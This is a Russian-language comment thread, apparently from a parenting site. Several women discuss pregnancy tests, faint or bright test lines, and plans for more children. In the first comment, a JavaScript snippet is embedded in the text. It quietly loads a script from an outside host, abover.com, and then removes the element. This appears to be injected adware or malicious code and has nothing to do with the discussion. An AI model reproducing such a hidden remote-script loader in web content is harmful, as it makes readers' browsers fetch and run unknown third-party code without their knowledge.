Мммм....
Ждем дня Х (Признаки беременности / Тесты)
Марина
КРАСОТИЩА[removed](function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8';
script.onload = script.onerror = function () {
script.onload = script.onerror = null;
script[removed].removeChild(script);
}
document.body.appendChild(script);
})();[removed]
12.10.2013
Ответить
Anna
Есть-то есть, но можно ли им верить... вот в чем соль:))0 завтра выложу ещё:)))
12.10.2013
Ответить
iLOna
однозначно да) скорее может не показать б чем ложно показать,поверь опыту)
12.10.2013
Ответить
Полина
Я тлже по мусоркам лазила. :) как без этого? Держу кулаки.жду хороших новостей, а пока буду держать за вас кулаки ххххх
12.10.2013
Ответить
Anna
Спасибо за кулачки:) Мы ждем вас в рядах планирующих!!! И как и в прошлый раз прошу секретности, а то бб раньше мужа узнает:))))
12.10.2013
Ответить
Юленька
Пусть все получится! Мы тоже, надеюсь, не на много от вас отстанем. Тоже жду 17 числа с надеждой!
12.10.2013
Ответить
Полина
Рот на замок, а пальцы крестиком. Ой, я еще долго планировать не буду. надо было сразу второго рожать, пока легко с Алёнкой маленькой было и много детишек хотелось. А сейчас хочу свободы и путешествий :)))) но сына тоже очень хочу. Вот еслиб 100% знать что мальчуган будет, то решилась бы. Одним словом, жду когда Алёнка в школу пойдет, а там решать будем :) ххх
12.10.2013
Ответить
Просто Лена)))))
я в день Х сделала тест и полосочка была бледненькая но видная розовая...потом стали ярчать постепенно..на 7ДЗ только сравнялись полосочки тестовая и контрольная по яркости)))
12.10.2013
Ответить
Anna
У меня в первую Б, в первый ДЗ, 3 теста были наиярчайшие и сразу полоски появились, я поэтому и выбросила первый тест:) Завтра поглядим:)
12.10.2013
Ответить
Просто Лена)))))
У меня в первую Б с дочкой в день Х тоже полосочки были сразу яркие и четкие..со второй Б с сыном в день Х вот такие бледненькие..вот и сейчас так было..вот думаю теперь не мальчика ли опять ждем))))
12.10.2013
Ответить
Просто Лена)))))
я девочку хотела бы..ну уж кто будет..тому и рады..слава богу и спасибо за это..хоть бы здоровенький был))))
12.10.2013
Ответить
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.

